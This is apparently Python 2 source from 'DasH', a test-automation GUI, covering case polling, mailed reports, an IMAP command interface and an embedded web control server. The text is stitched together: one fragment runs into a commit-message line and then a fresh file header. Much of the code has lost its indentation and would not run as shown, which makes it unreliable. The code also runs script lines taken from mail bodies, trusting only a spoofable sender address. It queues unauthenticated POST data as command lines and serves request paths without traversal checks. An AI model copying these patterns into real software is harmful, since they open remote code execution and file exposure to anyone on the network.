case_name, start_time, end_time, duration, return_code ,proc, log_path= self.dict_test_report[pid]
if return_code is None:
if proc.poll() is None:
running_case+=1
debug('RUNNING', start_time, end_time, duration, return_code ,proc, log_path)
else:
changed=True
return_code = 'FAIL' if proc.returncode else 'PASS'
self.update_case_status(pid,return_code)
if running_case:
pass
elif not self.case_queue.empty():#self.case_queue.qsize():
case_name_with_args = self.case_queue.get()
p, case_log_path = self.run_script(case_name_with_args)
self.check_case_running_status_lock.release()
if changed:
#test_report = self.generate_report(filename='{}/dash_report.txt'.format(self.log_path))
self.mail_test_report('DasH Test Report-updating')
return changed
    def polling_running_cases(self):
        """Background loop: refresh the status of running cases every 10s
        until the app shuts down (self.alive goes False)."""
        try:
            while self.alive:
                time.sleep(10)
                try:
                    self.check_case_status()
                except:
                    # Only worth reporting while the app is still alive.
                    if self.alive:
                        error(traceback.format_exc())
        except:
            pass
        print('end polling_running_cases')
        time.sleep(0.01)
        #sys.exit(0) #break can't exit the app immediately, so change it to exit
        #self.check_case_running_status_lock.acquire()
        #self.check_case_running_status_lock.release()
def add_new_case_to_report(self, pid, case_name, proc, log_path):
start_time=datetime.now()
duration = 0
end_time = None
return_code = None
#self.check_case_running_status_lock.acquire()
if pid in self.dict_test_report:
self.dict_test_report[pid].update([case_name, start_time, end_time, duration, return_code, proc, log_path])
else:
self.dict_test_report[pid]= [case_name, start_time, end_time, duration, return_code, proc, log_path ]
#self.check_case_running_status_lock.release()
def update_case_status(self, pid,return_code=None):
now = datetime.now()
case_name, start_time, end_time, duration, tmp_return_code ,proc,log_path= self.dict_test_report[pid]
if tmp_return_code is None:
duration = (now-start_time).total_seconds()
if return_code is not None:
end_time=now
self.dict_test_report[pid]=[case_name,start_time, end_time, duration, return_code, proc, log_path]
else:
pass# don't update one case result twice
    def mail_test_report(self, subject="DASH TEST REPORT-updating"):
        """Generate the HTML report and mail it.

        A subject containing 'updating' sends an incremental report (only
        in-progress and not-yet-mailed cases); any other subject sends the
        full report. Failures are logged, never raised.
        """
        try:
            #self.check_case_status()
            report_all_cases=True
            if subject.find('updating')!=-1:
                report_all_cases=False
            test_report = self.generate_report(filename='{}/dash_report_{}.html'.format(self.log_path, self.timestamp),report_all_cases= report_all_cases)
            #TO, SUBJECT, TEXT, SERVER, FROM
            send_mail_smtp_without_login(self.mail_to_list, subject,test_report,self.mail_server,self.mail_from)
        except Exception as e:
            error(traceback.format_exc())
def on_mail_test_report(self,event):
self.mail_test_report('DasH Test Report-requested')
#p.terminate()
    def on_handle_request_via_mail(self):
        """Poll the IMAP inbox and act on unseen command mails.

        Only mails from addresses in mail_to_list are honoured. The subject
        selects the action (see `support_list` below); a 'dash-request-run'
        mail's body is parsed as one case per line and queued. Handled mails
        are marked seen by re-fetching them without PEEK.
        """
        import imaplib
        from email.parser import Parser
        def process_multipart_message(message):
            # Flatten a (possibly nested) multipart message into one string.
            if isinstance(message, basestring) or isinstance(message , list):
                return message
            rtn = ''
            try:
                if message.is_multipart():
                    for m in message.get_payload():
                        rtn += process_multipart_message(m)
                else:
                    rtn += message.get_payload()
            except Exception as e:
                pass
            return rtn
        url, user, password = self.mail_read_url,self.mail_user, self.mail_password
        # The placeholder account means mail polling is disabled.
        if self.mail_user in ['nonexistent@dash.com']:
            return
        conn = imaplib.IMAP4_SSL(url,993)
        #conn.logout()
        #conn.authenticate('')
        conn.debug = 0#10
        def plain_callback(response):
            # SASL PLAIN credential string: authzid NUL authcid NUL password.
            return "{}\x00{}\x00{}".format(user.lower(),user.lower(),password)
        try:
            conn.authenticate('PLAIN',plain_callback)
        except:
            # Fall back to plain LOGIN when the server rejects SASL PLAIN.
            conn.login(user,password)
        self.mail_failure = False
        conn.select('INBOX')#, readonly=True)
        try:
            authorized_mail_address = self.mail_to_list.replace(',',';').split(';')
        except Exception as e:
            return
        for mail_address in authorized_mail_address:
            results,data = conn.search(None,'(UNSEEN)', '(FROM "{}")'.format(mail_address)) # #'ALL')
            msg_ids = data[0]
            msg_id_list = msg_ids.split()
            MAX_UNREAD_MAIL = 50
            # Newest first, capped so a flooded inbox can't stall the poller.
            for unread_mail_id in msg_id_list[::-1][:MAX_UNREAD_MAIL]:
                # PEEK keeps the message unread until we decide to handle it.
                result,data = conn.fetch(unread_mail_id,'(BODY.PEEK[HEADER])')#"(RFC822)")#
                raw_email = data[0][1]
                p = Parser()
                msg = p.parsestr(raw_email)
                #msg = process_multipart_message(msg )
                from1 = msg.get('From')
                sub = '{}'.format(msg.get('Subject'))
                sub = sub.strip().lower()
                support_list='''
                ###############################
                mail subject below is supported:
                dash-request-case-queue : request the cases in queue which to be executed
                dash-request-case : request cases which are under suite_path
                dash-request-report : request a test report by now
                dash-request-kill-running : to kill all running test cases
                dash-request-clear-queue : to clear/remove all cases which are in case queue
                dash-request-run : to run script(s), each line is a script with arguments if it has
                --------------------------------
                ***non-case-sensitive***
                ###############################
                '''
                handled =False
                if sub in ['dash']:
                    send_mail_smtp_without_login(self.mail_to_list, 'DONE-DasH Support List',support_list,self.mail_server,self.mail_from)
                    handled = True
                    #conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
                elif sub in ['dash-request-case-queue']:
                    case_in_queue =self.get_case_queue(None)
                    send_mail_smtp_without_login(self.mail_to_list, 'DONE-DasH:Case In Queue',case_in_queue+support_list,self.mail_server,self.mail_from)
                    #conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
                    handled = True
                elif sub in ['dash-request-case']:
                    cases_string = '\n\t'.join(self.case_list)
                    send_mail_smtp_without_login(self.mail_to_list, 'DONE-DasH:Case List',cases_string+support_list,self.mail_server,self.mail_from)
                    handled = True
                    #conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
                elif sub in ['dash-request-report']:
                    self.mail_test_report('DasH Test Report-requested')
                    #conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
                    handled = True
                elif sub in ['dash-request-kill-running']:
                    killed= self.on_kill_running_case()
                    send_mail_smtp_without_login(self.mail_to_list, 'DONE-[DasH]:Killed Running Case(s)',killed+support_list,self.mail_server,self.mail_from)
                    handled = True
                    #conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
                elif sub in ['dash-request-clear-queue']:
                    case_in_queue = self.on_clear_case_queue()
                    send_mail_smtp_without_login(self.mail_to_list, 'DONE-DasH:Clear Case Queue',case_in_queue+support_list,self.mail_server,self.mail_from)
                    handled = True
                    #conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
                elif sub in ['dash-request-run']:
                    #if from1 in [ 'yu_silence@163.com',self.mail_to_list]:
                    conn.uid('STORE', unread_mail_id, '+FLAGS', r'(\SEEN)')
                    handled = True
                    #conn.uid('STORE', '-FLAGS', '(\Seen)')
                    payload = msg.get_payload()
                    payload = process_multipart_message(payload )
                    from lib.html2text import html2text
                    txt = html2text(payload)
                    # One case (script + args) per non-comment body line.
                    cases = txt.replace('\r\n','\n').split('\n')
                    for line in cases:
                        line = line.strip()
                        if line.strip().startswith('#') or len(line)==0:
                            pass
                        else:
                            #done: replace lines below with a function
                            self.add_line_to_case_queue(line)
                    result,data = conn.fetch(unread_mail_id,'(RFC822)')#"(RFC822)")#
                else:
                    # Unknown subject: make sure the mail stays unread.
                    conn.uid('STORE', unread_mail_id, '-FLAGS', r"(\SEEN)")
                #fixed : 2017-09-25 failed to set unmatched mail to unread, to fetch it again with RFC822
                if handled:
                    # Full fetch (no PEEK) marks the handled mail as seen.
                    result,data = conn.fetch(unread_mail_id,'(RFC822)')#"(RFC822)")#
def check_case_type(self, str_line):
lex = shlex.shlex(str_line)
lex.quotes = '"'
lex.whitespace_split = True
script_name_and_args = list(lex)
script_name = script_name_and_args[0]
return script_name.lower().split('.')[-1],script_name_and_args[0] ,script_name_and_args[1:]
def polling_request_via_mail(self):
try:
while self.alive:
time.sleep(5)
try:
self.on_handle_request_via_mail()
self.mail_failure =False
except Exception as e:
self.mail_failure =True
except :
pass
print('end polling_request_via_mail!!!')
time.sleep(0.01)
def get_case_queue(self, item=None):
case_in_queue = list(self.case_queue.queue)
number_in_queue= len(case_in_queue)
if number_in_queue:
str_case_in_queue='\ntotal {} case(s) in Queue\n'.format(number_in_queue)+'\n'.join('{}'.format(x) for x in case_in_queue)
else:
str_case_in_queue='\nNo Case in Queue'
info('Case(s) in Queue', str_case_in_queue)
return str_case_in_queue
def on_clear_case_queue(self, event=None):
case_in_queue = self.get_case_queue(None)
self.case_queue.queue.clear()
self.get_case_queue(None)
return case_in_queue
def on_kill_running_case(self,event=None):
killed_case= ''
for case in self.dict_test_report:
case_name,start_time, end_time, duration, return_code, proc, log_path = self.dict_test_report[:7]
if return_code is None:
if proc.poll() is None:
killed_case+='{}:{}\n'.format(case_name, proc.pid)
info('Terminate alive process {}:{}'.format(case_name, proc.pid))
result ='KILL'
self.update_case_status(proc.pid, result)
proc.terminate()
info('Killed All Running cases', killed_case)
return killed_case
def run_a_test_suite(self, csv_file_name, clear_queue=False, kill_running =False):
try:
case_type, suite_file_name, args =self.check_case_type(csv_file_name)
if clear_queue:
self.on_clear_case_queue()
if kill_running:
self.on_kill_running_case()
import csv
if suite_file_name.find(os.path.sep)!=-1:
pass
else:
suite_file_name= '{}/{}'.format(self.suite_path,suite_file_name)
with open(suite_file_name) as bench:
reader = csv.reader(bench,delimiter=',')
for row in reader:
if len(row)<1:
continue
else:
name = row[0]
args.insert(0,0)
for index in range(1,len(args)):
name =name.replace('{{index}}'.format(index =index), '{}'.format(args[index]))
self.case_queue.put(name)
info('adding case to queue: {}'.format(name))
except Exception as e:
error(traceback.format_exc())
    def web_server_start(self):
        """Start DasH's built-in HTTP control server (blocks in serve_forever).

        Serves the ./html folder plus browsable /case, /suite, /log and
        /sessions views, and accepts POSTed run requests that are queued via
        add_line_to_case_queue.  Python 2 only (SocketServer/BaseHTTPServer).
        Intended to run on its own thread since serve_forever() never returns.
        """
        from SocketServer import ThreadingMixIn
        from BaseHTTPServer import HTTPServer,BaseHTTPRequestHandler
        import cgi , urllib#StringIO
        # Request handler; class attributes capture the enclosing frame's state
        # at definition time so handler instances can reach the GUI's queue.
        class HttpHandler(BaseHTTPRequestHandler):
            runner_proc =self.add_line_to_case_queue
            root = os.path.dirname(__file__)+ '/html/'
            home = root
            suite_path = self.suite_path
            log_path = self.log_path
            session_path = self.session_path
            def __del__(self):
                #self.hdrlog.close()
                #print('end http server')
                pass
            def list_dir(self, path, related_path, pattern=['']):
                """Helper to produce a directory listing (absent index.html).
                Return value is either a file object, or None (indicating an
                error). In either case, the headers are sent, making the
                interface the same as for send_head().
                """
                content =""
                try:
                    list = os.listdir(path)
                except os.error:
                    self.send_error(404, "No permission to list directory")
                    return ""
                list.sort(key=lambda a: a.lower())
                #f = StringIO()
                displaypath = cgi.escape(urllib.unquote(self.path))
                content='<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">'
                content+="<html>\n<title>Directory listing for %s</title>\n" % displaypath
                content+="<body>\n<h2>Directory listing for %s</h2>\n" % displaypath
                content+="<hr>\n<ul>\n"
                # Inline JS: post() sends a Run request back to this server,
                # newHTML() shows the server's reply in a popup window.
                content+='''
                <SCRIPT>
                function post( id, script, dest )
                {
                    element = document.getElementById(id);
                    value = element.value
                    params = 'script='+encodeURI(script)+'&arg='+encodeURI(value)
                    var xmlhttp;
                    if (window.XMLHttpRequest)
                    {// code for IE7+, Firefox, Chrome, Opera, Safari
                        xmlhttp=new XMLHttpRequest();
                    }
                    else
                    {// code for IE6, IE5
                        xmlhttp=new ActiveXObject('Microsoft.XMLHTTP');
                    }
                    xmlhttp.onreadystatechange=function()
                    {
                        if (xmlhttp.readyState==4 && xmlhttp.status==200)
                        {
                            alert(xmlhttp.responseText);
                            newHTML( xmlhttp.responseText);
                            setTimeout("window.close()",3000);
                        }
                    }
                    xmlhttp.open("POST",dest,true);
                    xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
                    xmlhttp.send( params );
                }
                function newHTML(HTMLstring) {
                    //var checkitem = mygetCheckedItem();
                    //HTMLstring=post( 'manualtest','/cgi-bin/onSUTLIST.py', 'bedname='+encodeURI(checkitem) );
                    var newwindow=window.open();
                    var newdocument=newwindow.document;
                    newdocument.write(HTMLstring);
                    newdocument.close();
                }
                </SCRIPT>
                <table>
                '''
                for name in list:
                    extension = os.path.basename(name).split('.')[-1]
                    # Filter entries by extension unless the pattern is a wildcard.
                    if pattern in ['', '*', '*.*']:
                        pass
                    elif extension in pattern:
                        pass
                    else:
                        continue
                    fullname = os.path.join(path, name)
                    displayname = linkname = name
                    # Append / for directories or @ for symbolic links
                    if os.path.isdir(fullname):
                        displayname = name + "/"
                        linkname = name + "/"
                    if os.path.islink(fullname):
                        displayname = name + "@"
                        # Note: a link to a directory displays with @ and links with /
                    input_button =""
                    filename = urllib.quote(linkname)
                    if not related_path.endswith('/'):
                        related_path+='/'
                    fullfilename =related_path+urllib.quote(linkname)
                    # Case/suite files get an inline "Run" button wired to post().
                    if related_path.startswith('/case') and os.path.isfile(fullname):
                        input_button = """
                        <input id=%s name="ARGS" style="width:200" type="text" value="" rows="1" autocomplete="on">
                        <input name="go" value="Run" type="button" onClick="post('%s','%s', 'RunCase')";>"""%(filename,filename,fullfilename)
                    elif related_path.startswith('/suite') and os.path.isfile(fullname):
                        input_button = """
                        <input id=%s name="ARGS" style="width:200" type="text" value="" rows="1" autocomplete="on">
                        <input name="go" value="Run" type="button" onClick="post('%s','%s', 'RunSuite')";>
                        </td></tr>\n"""%(filename,filename,fullfilename)
                    content+='<tr><td><a href="%s">%s</a></td><td>'% (related_path+urllib.quote(linkname), cgi.escape(displayname))+input_button
                content+="</table></ul>\n<hr>\n</body>\n</html>\n"
                return content
            def array2htmltable(self,Array):
                # Render a 2-D list as a numbered, bordered HTML table.
                content = "<table border='1' align='left' width=autofit >"
                for index , sublist in enumerate( Array):
                    content += ' <tr><td>\n%d</td><td>'%(index+1)
                    content += ' </td><td>'.join([x if x!='' else ' ' for x in sublist ])
                    content += ' \n</td></tr>\n'
                content += ' \n </table><br>'
                return content
            def show_content_by_path(self, path, type='csv'):
                # Render a file (csv -> table, otherwise paragraph-per-line) or,
                # for a directory, a listing filtered by extension *type*.
                header = '''
                <table border="0" align='center' width="100%" >
                <tr> <td align=center valign=middle><a href="/">Back to DasH</a></td> </tr>
                </table>'''
                footer = header
                if os.path.isfile(path):
                    indexpage= open(path)
                    encoded=indexpage.read()
                    html = []
                    for line in encoded.split('\n'):
                        html.append('<p>%s</p>'%line.replace('\r', '').replace('\n',''))
                    encoded= ''.join(html)
                    if type in ['csv']:
                        ar =[]
                        for line in html:
                            row = line.split(',')
                            ar.append(row)
                        encoded = self.array2htmltable(ar)
                    # elif type in ['py']:
                    #     ar =[]
                    #     for line in html:
                    #         row = line.split(',')
                    #         ar.append(row)
                    #     encoded = self.array2htmltable(ar)
                else:
                    encoded =self.list_dir(path, self.path, type)
                #encoded = "<html>{}</html>".format(cgi.escape(encoded))
                encoded =header+encoded.replace('\t', ' ').replace(' ', ' ') + footer
                return encoded
            def do_GET(self):
                # Route GET requests: static pages first, then browsable views.
                root = self.root
                home = self.home
                suite_path = self.suite_path
                log_path = self.log_path
                response = 200
                type = 'text/html'
                if self.path=='/':
                    indexpage= open(home+ 'index.html', 'r')
                    encoded=indexpage.read()
                    encoded = encoded.encode(encoding='utf_8')
                elif self.path =='/favicon.ico':
                    indexpage= open(home+'dash.bmp', 'r')
                    encoded=indexpage.read()
                    type = "application/x-ico"
                elif self.path=='/home':
                    path = os.path.abspath(self.suite_path)
                    encoded =self.list_dir(path, './')
                elif self.path.startswith('/sessions'):
                    path = os.path.abspath(self.session_path)
                    path = path+ self.path[9:]#replace('/log/','/')
                    encoded = self.show_content_by_path(path)
                elif self.path.startswith('/case'):
                    path = os.path.abspath(self.suite_path)
                    path = path+ self.path[5:]#replace('/log/','/')
                    encoded = self.show_content_by_path(path, 'py')
                elif self.path.startswith('/suite'):
                    path = os.path.abspath(self.suite_path)
                    path = path+ self.path[6:]#replace('/log/','/')
                    encoded = self.show_content_by_path(path, 'csv')
                elif self.path.startswith('/log'):
                    path = os.path.abspath(self.log_path)
                    print(path)
                    path = path+ self.path[4:]#replace('/log/','/')
                    encoded = self.show_content_by_path(path, '*')
                else:
                    # Anything else is resolved under the html root folder.
                    path = os.path.abspath(root)
                    path = path+ self.path.replace('//','/')
                    if os.path.isfile(path):
                        from lib.common import csvfile2array
                        arrary = csvfile2array(path)
                        encoded = self.array2htmltable(arrary)
                    else:
                        encoded =self.list_dir(path, self.path)
                self.send_response(200)
                self.send_header("Content-type", type)
                self.end_headers()
                self.wfile.write(encoded)
            def LoadHTMLPage(self, filename, replace=[], Pattern4ESCAPE1='#NOTEXISTPATTERN_HERE_FOR_STRING_FORMAT1#',Pattern4ESCAPE2='#NOTEXISTPATTERN_HERE_FOR_STRING_FORMAT2#'):
                # Fill an HTML template: each '%s' is replaced in order by an
                # item of *replace*; literal '%' characters are protected with
                # sentinel patterns so they survive the substitution.
                indexpage= open(filename, 'r')
                encoded=indexpage.read()
                encoded =encoded.replace('%s',Pattern4ESCAPE1 )
                encoded =encoded.replace('%',Pattern4ESCAPE2 )
                encoded =encoded.replace(Pattern4ESCAPE1,'%s' )
                for item in replace:
                    encoded =encoded.replace('%s', item, 1)
                encoded =encoded.replace(Pattern4ESCAPE2, '%' )
                return encoded
            def RunScript(self, script, args=None):
                # Queue *script* for execution and echo the confirmation back.
                if not args:
                    args =''
                exe_cmd = '%s %s'%(script,args)
                print('Run Script:'+exe_cmd)
                encoded = self.runner_proc(exe_cmd)
                #encoded ='run{}'.format(exe_cmd)
                self.send_response(200)
                self.send_header("Content-type", "text/html")#; charset=%s" % enc)
                self.end_headers()
                self.wfile.write(encoded)
            def ParseFormData(self, s):
                # Minimal multipart/form-data parser: returns a (field name,
                # uploaded file name, file data) tuple, or None when *s* does
                # not look like a multipart body.
                import re
                reP = re.compile('^(-+[\d\w]+)\r\n(.+)-+[\d\w]+-*', re.M|re.DOTALL)
                #s = '''-----------------------------186134213815046583202125303385\r\nContent-Disposition: form-data; name="fileToUpload"; filename="case1.csv"\r\nContent-Type: text/csv\r\n\r\n,ACTION,EXPECT,TIMEOUT,CASE OR COMMENTS\n[case1],,,,\n#var,\ncmd,${5}\ncmd2,${cmd2}\n#setup,,,,\ntel,pwd,],10\ntel,ls,],10,\n,ls,],10,\ntel,${cmd},],10,\n,${cmd2},],10,\n#!---,,,,\n\n\r\n-----------------------------186134213815046583202125303385--\r\n'''
                #rs = re.escape(s)
                rs =s
                m = re.match(reP, rs)
                print(rs)
                if m:
                    print('match!')
                    boundary = m.group(1)
                    print(m.group(2))
                    c = m.group(2)
                    index =c.find(boundary)
                    if index ==-1:
                        pass
                    else:
                        c = c[:index]
                    l = c.split('\r\n')
                    print(l)
                    attribute=l[0].split('; ')
                    da={}
                    la =attribute[0].split(':')
                    da.update({la[0]:la[1]})
                    for a in attribute[1:]:
                        la=a.split('=')
                        da.update({la[0]:la[1].replace('"','').replace('\'','')})
                    data = '\r\n'.join(l[3:-1])
                    filename = da['filename']
                    # Strip any client-side path (Windows or POSIX separators).
                    if filename.find('\\')!=-1:
                        filename=filename[filename.rfind('\\')+1:]
                    else:
                        filename=filename[filename.rfind('/')+1:]
                    return (da['name'],filename,data)
                else:
                    print('not match')
                    return None
            def do_POST(self):
                # Handle form posts: urlencoded 'script'/'arg' run requests
                # first, then a multipart file-upload fallback, then a raw
                # request-line fallback.
                content_len = int(self.headers['Content-Length'])
                #self.queryString
                self.path
                s = self.rfile.read(content_len)
                encoded=''
                try:
                    s=str(s)
                    import urlparse
                    req = urlparse.parse_qs(urlparse.unquote(s))
                    script = '{}/{}'.format(self.suite_path, req['script'][0][7:])
                    if req.has_key('arg'):
                        arg= req['arg'][0]
                    else:
                        arg = ''
                    executefile =''
                    cmd_line = script+ ' '+ arg
                    encoded=self.runner_proc(cmd_line)
                    #print(encoded)
                    encoded = encoded.encode(encoding='utf_8').replace('\t', ' ').replace('\n','')
                    self.send_response(200)
                    self.send_header("Content-type", "text/html")#; charset=%s" % enc)
                    self.end_headers()
                    self.wfile.write(encoded)
                except Exception as e:
                    import traceback
                    print(traceback.format_exc())
                    response = self.ParseFormData(s)
                    if response:
                        type, filename, data =response
                        encoded = self.onUploadFile(type, filename, data)
                    else:
                        encoded ='ERROR: %s, Can\'t parse Form data: %s'%(str(e),s)
                        encoded= encoded.encode(encoding='utf_8')
                        try:
                            requestline = self.requestline
                            import re
                            reScript=re.compile('POST\s+(.+)\s+HTTP.*', re.DOTALL)
                            m= re.match(reScript, requestline)
                            if m:
                                returncode =self.RunScript(m.group(1),[])
                                encoded ='script %s completed with return code %d!'%(m.group(1), returncode)
                        except Exception as e:
                            encoded ='can\'t run script!'
                        encoded = encoded.encode(encoding='utf_8', errors='strict')
                        # self.send_response(200)
                        # self.send_header("Content-type", "text/html")#; charset=%s" % enc)
                        # self.end_headers()
                        # self.wfile.write(encoded)
        port =self.web_port
        home = __file__ #sys.argv[0]
        if os.path.exists(home):
            home = os.path.dirname(home)
            root = home
            home = home +'/html/'
        #done move runWebserver to DasH, and launch it at dash initialization
        class ThreadingHttpServer(ThreadingMixIn, HTTPServer):
            pass
        httpd=ThreadingHttpServer(('',port), HttpHandler)
        from socket import socket, AF_INET, SOCK_DGRAM, gethostname,SOL_SOCKET, SO_REUSEADDR, getfqdn#*
        try:
            # Discover this host's outbound IP by connecting a UDP socket (no
            # traffic is actually sent) and reading the local address chosen.
            hostip=''
            s = socket(AF_INET, SOCK_DGRAM)
            s.bind(("", 1234))
            #sq = socket(AF_INET, SOCK_DGRAM)
            s.connect(("10.0.0.4", 1234))
            domain = getfqdn()
            hostip = s.getsockname()[0]
            self.web_host = hostip
            self.SetTitle('DasH-{}:{}'.format(self.web_host, self.web_port))
            s.close()
        except Exception as e:
            import traceback
            msg = traceback.format_exc()
            print(msg)
        hostname =gethostname()
        info("Server started on %s (%s),port %d....."%(hostname,hostip,port))
        #print('Process ID:%d'%os.geteuid())
        self.web_daemon= httpd
        on=1
        self.web_daemon.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, on)
        httpd.serve_forever()
        # NOTE(review): serve_forever() blocks, so this cleanup is only reached
        # after shutdown() is called from another thread.
        try:
            s.close()
        except:
            pass
def add_line_to_case_queue(self,line):
type_case, case_name, args = self.check_case_type(line)
if type_case in ['txt','csv']:
self.run_a_test_suite(line)
else:
self.case_queue.put(line)
return info('adding case to queue: {}'.format(line))
    def OnMouseMotion(self, evt):
        """Show a tooltip describing the tree item currently under the mouse.

        Prefers an explicit 'tip' entry in the item's data dict; otherwise
        pretty-prints the whole data dict as the tooltip.
        """
        try:
            active_page = self.navigator.GetCurrentPage()
            pos = self.case_suite_page.ScreenToClient(wx.GetMousePosition())
            item_index, flag = active_page.HitTest(pos)
            item_data = active_page.GetItemData(item_index)
            tip = active_page.GetToolTip()
            if item_data :
                if item_data.Data.has_key('tip'):
                    active_page.SetToolTipString(item_data.Data['tip'])
                else:
                    from pprint import pformat
                    tip_string = pformat(item_data.Data)
                    active_page.SetToolTipString(tip_string)
            # Disabled alternative: tooltip only when hovering the label text.
            if False:
                if flag == wx.LIST_HITTEST_ONITEMLABEL:
                    active_page.SetToolTipString('Some information about ' + self.case_suite_page.GetItemText(item_index))
                else:
                    active_page.SetToolTipString('')
        except Exception as e:
            # Hit-testing can fail while pages are created/destroyed; ignore.
            pass
        evt.Skip()
    def on_keyboard_key_down(self,event):
        # No custom shortcut handling here; let default processing continue.
        event.Skip()
    @gui_event_decorator.gui_even_handle
    def on_generate_code(self, event):
        # Emit the recorded session as a runnable Python file, timestamped so
        # each generated file is unique and filesystem-safe (no ':' or '.').
        self.generate_code('{}/test_code_{}.py'.format(self.suite_path, datetime.now().isoformat().replace(':','-').replace('.','-')))
    def on_right_up_over_tab_in_edit_area(self, event):
        """Right-click on an editor tab: reopen the tab's session asynchronously."""
        x = event.GetEventObject()
        tabID = x.GetId()
        tab = x.FindWindowById(tabID)
        #session.session.open(retry, interval)
        #tab.open(3,15)
        # Run open() on a worker thread so a slow reconnect can't freeze the GUI.
        th =threading.Thread(target=self.edit_area.GetCurrentPage().open, args=[1, 5])
        #index = self.edit_area.GetCurrentPage().open(1, 60)
        th.start()
        event.Skip()
        #self.edit_area.SetSelection(index)
def idle_process(self):
try:
self.on_handle_request_via_mail()
self.mail_failure =False
except Exception as e:
self.mail_failure =True
try:
self.check_case_status()
except:
pass
#print('{} i\'m idle !!!!!!!!!!!!!!!!!!'.format(datetime.now().isoformat()))
def on_idle(self,event):
now = datetime.now()
max_idle=3
if (now-self.last_time_call_on_idle).total_seconds()>max_idle:
self.last_time_call_on_idle=now
th=threading.Thread(target=self.idle_process, args=[])
th.start()
threading.Thread(target=self.check_whether_function_file_is_updated, args=[]).start()
    @gui_event_decorator.gui_even_handle
    def on_generate_test_report(self,event):
        """Generate the HTML test report and print a URL where it can be viewed."""
        file_name='{}/dash_report_{}.html'.format(self.log_path, self.timestamp)
        report = self.generate_report(filename=file_name)#'{}/dash_report_{}.html'.format(self.log_path, self.timestamp))
        # Prefix the report text with its /log URL on the embedded web server.
        report = 'http://{}:{}/log/{}\n{}'.format(self.web_host, self.web_port, file_name.replace(self.log_path, ''),report)
        print(report)
    @gui_event_decorator.gui_even_handle
    def on_leftD_click_url_in_m_log(self, event):
        """Open a URL from the log window in the default browser on double-click."""
        #print(urlString)
        mouseEvent = event.GetMouseEvent()
        if mouseEvent.LeftDClick():
            urlString = self.m_log.GetRange(event.GetURLStart(),event.GetURLEnd())
            webbrowser.open(urlString)
        event.Skip()
#done: 2017-08-22, 2017-08-19 save main log window to a file
#done: 2017-08-19 add timestamps to log message
#done: 2017-08-22, 2017-08-19 mail to someone
#done: 2017-08-19 run a script in DasH
#done: 2017-08-19 generate test report
#done: 2017-10-7 2017-08-19 publish all test cases in a web page
#done: 2017-10-7 2017-08-19 trigger a test remote via web page
#todo: 2017-08-19 re-run failed cases
#done: 2017-08-19 build executable package for DasH
#todo: 2017-08-19 a popup window to get email address/password/mail_server...
#done: 2017-08-22 output in m_log window has a lot of empty line, need remove them
#todo: 2017-08-23 in common.call_function_in_module, should end all threads which are started in previous instance
#done: 2017-10-7 2017-08-23 add tips for all tree items in the left
#done: 2017-10-7 2017-09-30 failed to send command to a session whose name start with numbers e.g. 1_session
# Traceback (most recent call last):
# File "C:/workspace/gDasH\gui\DasHFrame.py", line 588, in on_command_enter
# instance_name, function_name, new_argvs, new_kwargs, str_code = call_function_in_module(module,class_name,function,args, globals())
# File "C:/workspace/gDasH\lib\common.py", line 153, in call_function_in_module
# eval('GetFunArgs({args})'.format(args=args_string))
# File "<string>", line 1
# GetFunArgs(35b)
# ^
# SyntaxError: invalid syntax
#todo: start thread for all gui event handlers with decoration, catch all exceptions
remove debug info--show src function/class instance refcount
#!/usr/bin/python
'''The MIT License (MIT)
Copyright (c) 2017 Yu Xiong Wei(try.dash.now@gmail.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.'''
__author__ = 'sean yu (Yu, Xiongwei)'
__doc__ = '''
it's GUI of DasH aka Do as Human
created 2017-05-06 by Sean Yu
'''
import webbrowser
from datetime import datetime
import wx.grid as gridlib
import traceback
import wx
from gui.MainFrame import MainFrame
import os
from lib.common import load_bench, caller_stack_info,info, get_next_in_ring_list,get_folder_item, info,debug, warn, error, parse_command_line, call_function_in_module
import re
import time
import threading
import ConfigParser
import sys
import inspect
import Queue
from SessionTab import SessionTab
import imp
import types
from lib.common import send_mail_smtp_without_login
from lib.common import run_script
from multiprocessing import Process
import subprocess
import shlex
#from dut import dut
# Module-level registry of devices-under-test; populated at runtime elsewhere.
DUT={}
class RedirectText(object):
    """File-like object installed as sys.stdout/sys.stderr.

    Mirrors every write to the wx text control, the original stdout and
    (optionally) a dash.log file.  Writes are serialized with a lock because
    worker threads print concurrently.
    """
    font_point_size = 10
    # Original sys.stdout/sys.stderr, kept so console output still works.
    old_stdout = None
    old_stderr = None
    write_lock = None
    log_file = None
    error_pattern = None
    def __init__(self,aWxTextCtrl, log_path=None):
        self.old_stderr , self.old_stdout=sys.stderr , sys.stdout
        self.out=aWxTextCtrl
        self.font_point_size = self.out.GetFont().PointSize+2
        self.write_lock = threading.Lock()
        self.error_pattern = re.compile('error|\s+err\s+|fail|wrong|errno')
        if log_path:
            name = '{}/dash.log'.format(log_path)
            self.log_file = open(name, 'w+')
            # Expose the log file's fileno so callers can treat us as a file.
            self.fileno = self.log_file.fileno
    def write(self,string):
        # Serialize writes: called from multiple threads via print().
        self.write_lock.acquire()
        try:
            self.old_stdout.write(string)
            #string = string.replace('\\033\[[0-9\;]+m', '')
            #self.old_stderr.write(string)
